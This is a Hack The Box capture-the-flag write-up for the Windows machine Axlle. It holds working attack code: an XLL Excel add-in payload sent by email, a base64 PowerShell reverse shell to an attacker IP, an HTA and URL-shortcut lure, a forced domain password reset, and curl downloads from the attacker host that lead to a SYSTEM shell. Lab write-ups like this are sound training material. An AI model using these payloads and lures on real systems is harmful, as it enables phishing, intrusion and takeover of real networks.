Hack The Box / WINDOWS / 2026-03-27
Hack The Box - Axlle (Windows)
Malicious Excel XLL delivery through internal mail yields foothold, phishing-style HTA/URL pivot gives domain user shell, BloodHound abuse of ForceChangePassword enables lateral movement, and StandaloneRunner writable path abuse escalates to Administrator.
Target
- IP:
10.10.11.21
Recon
sudo nmap -sC -sV 10.10.11.21 -p- -v
PORT STATE SERVICE VERSION
25/tcp open smtp hMailServer smtpd
| smtp-commands: MAINFRAME, SIZE 20480000, AUTH LOGIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-favicon: Unknown favicon MD5: FAF2C069F86E802FD21BF15DC8EDD2DC
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Axlle Development
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-06-24 10:56:06Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: axlle.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: axlle.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=MAINFRAME.axlle.htb
| Issuer: commonName=MAINFRAME.axlle.htb
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-05-19T11:25:03
| Not valid after: 2024-11-18T11:25:03
| MD5: acc1:ec10:1311:0c34:c548:bd34:8cce:53f9
|_SHA-1: 9d6c:ac58:e52c:a711:9ffa:795f:171b:555c:cf0e:7fc9
| rdp-ntlm-info:
| Target_Name: AXLLE
| NetBIOS_Domain_Name: AXLLE
| NetBIOS_Computer_Name: MAINFRAME
| DNS_Domain_Name: axlle.htb
| DNS_Computer_Name: MAINFRAME.axlle.htb
| DNS_Tree_Name: axlle.htb
| Product_Version: 10.0.20348
|_ System_Time: 2024-06-24T10:56:57+00:00
|_ssl-date: 2024-06-24T10:57:36+00:00; 0s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49664/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
57803/tcp open msrpc Microsoft Windows RPC
62038/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
62039/tcp open msrpc Microsoft Windows RPC
62473/tcp open msrpc Microsoft Windows RPC
62483/tcp open msrpc Microsoft Windows RPC
Service Info: Host: MAINFRAME; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2024-06-24T10:56:57
|_ start_date: N/A
Add axlle.htb to /etc/hosts.
Browse http://axlle.htb.
Page message:
Our website is currently down for maintenance.
We apologise for the inconvenience and appreciate your patience as we work to improve our online presence.
If you have any outstanding invoices or requests, please email them to accounts@axlle.htb in Excel format. Please note that all macros are disabled due to our security posture.
We will be back as soon as possible. Thank you for your understanding.
Useful references:
https://blog.talosintelligence.com/xlling-in-excel-malicious-add-ins/https://stackoverflow.com/questions/9205835/developing-an-excel-xll-using-mac-os-x-linux
Building a Malicious XLL (Attempt 1)
Use a Windows VM.
Install:
- Visual Studio 2022 Community
- .NET desktop development workload
Create a C# class library project.
Open NuGet package manager and install ExcelDna.
Edit ClassLibrary1.csproj:
<Project Sdk="Microsoft.NET.Sdk">
<PropertyGroup>
<TargetFramework>net8.0-windows</TargetFramework>
<ImplicitUsings>enable</ImplicitUsings>
<Nullable>enable</Nullable>
</PropertyGroup>
<ItemGroup>
<PackageReference Include="ExcelDna.Addin" Version="1.8.0" />
</ItemGroup>
</Project>
Edit class1.dll code to:
using ExcelDna.Integration;
namespace MyNamespace
{
public class MyAddIn : IExcelAddIn
{
public void AutoOpen()
{
string strCmdText;
strCmdText = "/C ping 10.10.16.42";
System.Diagnostics.Process.Start("CMD.exe", strCmdText);
}
public void AutoClose()
{
return;
}
}
}
Build the solution.
Generated XLL path:
ClassLibrary1\ClassLibrary1\bin\Release\net8.0-windows\publish
If opened in Excel, it launches a terminal and runs ping.
On attacker:
sudo tcpdump -i tun0 icmp
Try sending by email:
swaks --to accounts@axlle.htb --from user@example.com --header "Subject: test" --body 'a' --attach-type 'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet' --attach-body @test.xll --server 10.10.11.21
No pingback.
swaks --to accounts@axlle.htb --from user@example.com --header "Subject: test" --body 'a' --attach @test.xll --server 10.10.11.21
Still no callback.
Building a Working XLL (Attempt 2)
Useful repository:
https://github.com/moohax/xllpoc
Clone and open in Visual Studio.
Edit XLL_POC.cpp:
#include "stdafx.h"
short __stdcall xlAutoOpen()
{
system("ping 10.10.16.42");
return 0;
}
Build solution.
Output file:
xllpoc\XLL_POC\x64\Debug\XLL_POC.dll
Rename it to XLL_POC.xll.
Open in Excel and verify ping execution.
Copy XLL_POC.xll to attacker Linux machine.
sudo tcpdump -i tun0 icmp
swaks --to accounts@axlle.htb --from user@example.com --header "Subject: test" --body 'a' --attach @XLL_POC.xll --server 10.10.11.21
We get a pingback.
Initial Reverse Shell
Generate a PowerShell 3 Base64 payload from revshells.com.
Replace system call in XLL_POC.cpp with:
system("powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA2AC4ANAAyACIALAA0ADQANAA0ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==");
Rebuild and copy XLL to attacker.
Start listener:
nc -vlnp 4444
Resend mail.
We get a reverse shell.
Domain User Enumeration
cd \Users
dir
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 1/2/2024 3:05 AM Administrator
d----- 1/1/2024 3:44 AM baz.humphries
d----- 1/1/2024 3:43 AM brad.shaw
d----- 1/1/2024 3:44 AM calum.scott
d----- 1/1/2024 3:44 AM dallon.matrix
d----- 1/1/2024 3:44 AM dan.kendo
d----- 1/1/2024 5:58 AM gideon.hamill
d----- 1/1/2024 3:44 AM jacob.greeny
d----- 1/1/2024 3:43 AM lindsay.richards
d-r--- 1/22/2023 1:35 AM Public
d----- 1/1/2024 3:43 AM simon.smalls
d----- 1/1/2024 3:44 AM trent.langdon
Useful references:
https://book.hacktricks.xyz/generic-methodologies-and-resources/phishing-methodology/phishing-documents#hta-fileshttps://inquest.net/blog/shortcut-to-malice-url-files/
HTA + URL Lure for New Shell
On attacker:
sudo tcpdump -i tun0 icmp
mkdir smb
cd smb
Create test.hta:
<--! Basic HTA Execution -->
<html>
<head>
<title>Hello World</title>
</head>
<body>
<h2>Hello World</h2>
<p>This is an HTA...</p>
</body>
<script language="VBScript">
Function Pwn()
Set shell = CreateObject("wscript.Shell")
shell.run "cmd /C ping 10.10.16.42"
End Function
Pwn
</script>
</html>
Create shortcut.url:
[InternetShortcut]
URL=file://10.10.16.42/share/test.hta
Copy lure onto target through SMB:
impacket-smbserver -smb2support share $(pwd)
cp \\10.10.16.42\share\shortcut.url .
Wait for execution.
Pingbacks received.
Start netcat listener and replace ping command with reverse-shell command from revshells.com, then copy the URL shortcut again:
nc -vlnp 4444
cp \\10.10.16.42\share\shortcut.url .
We get a reverse shell as dallon.matrix.
BloodHound and ACL Abuse
Upload SharpHound.exe to target.
On attacker:
impacket-smbserver -smb2support -username test12 -password test12 share $(pwd)
On victim:
net use \\10.10.16.42\share /delete
net use \\10.10.16.42\share test12 /USER:test12
cp \\10.10.16.42\share\SharpHound.exe .
.\SharpHound.exe
cp 20240705084747_BloodHound.zip \\10.10.16.42\share\bloodhound.zip
Start tools:
sudo neo4j console
bloodhound --no-sandbox
Import ZIP in BloodHound.
Finding:
dallon.matrixis inWEB DEVS.WEB DEVShasForceChangePasswordoverbaz.humphries.
Upload PowerView (https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1) and load it:
. .\PowerView.ps1
$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
Set-DomainUserPassword -Identity baz.humphries -AccountPassword $UserPassword
From BloodHound, baz.humphries can remote into the domain controller mainframe.axlle.htb.
Connect:
evil-winrm -i 10.10.11.21 -u 'baz.humphries' -p 'Password123!'
Privilege Escalation to Administrator
cd 'C:\App Development\kbfiltr'
type Readme.md
**NOTE: I have automated the running of `C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\x64\standalonerunner.exe` as SYSTEM to test and debug this driver in a standalone environment**
Check ACLs:
cd 'C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal'
icacls x64
x64 AXLLE\App Devs:(OI)(CI)(RX,W)
Everyone:(I)(OI)(CI)(R)
AXLLE\Administrator:(I)(OI)(CI)(F)
BUILTIN\Users:(I)(OI)(CI)(R)
AXLLE\App Devs:(I)(OI)(CI)(RX)
NT SERVICE\TrustedInstaller:(I)(F)
NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)
NT AUTHORITY\SYSTEM:(I)(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
BUILTIN\Users:(I)(RX)
BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)
baz.humphries belongs to App Devs, so this folder is writable.
List files:
cd 'C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\x64\'
ls
standalonerunner.exe
Reference:
https://github.com/nasbench/Misc-Research/blob/main/LOLBINs/StandaloneRunner.md#putting-everything-together
Start listener:
nc -vlnp 4444
On victim:
mkdir -p myTestDir\working
Create rsf.rsf and copy it to myTestDir\working.
Create command.txt containing reverse shell command from revshells.com, and place it in the standalonerunner.exe directory.
Create reboot.rsf with:
myTestDir
True
Copy it to the same directory as standalonerunner.exe.
One-liner used:
curl http://10.10.16.42/reboot.rsf -o reboot.rsf; curl http://10.10.16.42/command.txt -o command.txt; mkdir -p myTestDir\working; curl http://10.10.16.42/rsf.rsf -o myTestDir\working\rsf.rsf
Wait.
We get a reverse shell as Administrator.